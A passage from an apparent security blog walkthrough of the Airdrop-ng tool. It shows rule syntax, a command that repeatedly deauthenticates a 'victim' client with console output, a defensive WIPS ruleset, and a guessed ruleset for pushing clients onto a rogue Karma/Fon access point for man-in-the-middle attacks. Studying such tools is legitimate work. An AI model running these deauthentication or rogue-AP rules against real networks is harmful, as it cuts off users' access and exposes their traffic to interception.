-Company OUI numeric value
-any

5 options for clients field
-mac
-multiple macs (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any

Add your rule Example:
Below is a rule that denys all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID

Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50

Rule explanation:
d = deny
/     <-- get this AP address from the airodump output
|       <-- in this case a clients address

Run airdrop with new rule: (Leave airodump running during this!!)
Now run Airodrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process. This will hopefully keep your victim from having network access.

root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv -r docs/dropRules.conf
#################################################
#             Welcome to AirDrop-ng             #
#################################################

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

.....................
...............................

Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode

Poor Man’s WIPS:
Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MAC's:
11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Create the list of your AP BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

Rules:
Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn’t shown during the demo because the presenters couldn’t get their monitors working correctly.. But I imagine the ruleset would be to deny all clients’ access to the legitimate BSSID's within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules which I am guessing would go something similar to the following, but I could be way off, this however should function similarly to what I think they were going to show us.

Make a list of local BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

FON MAC:
AB:CD:EF:12:34:56

Add In some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow Access to my evil AP's:
a/AB:CD:EF:12:34:56|any

I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...
--Ficti0n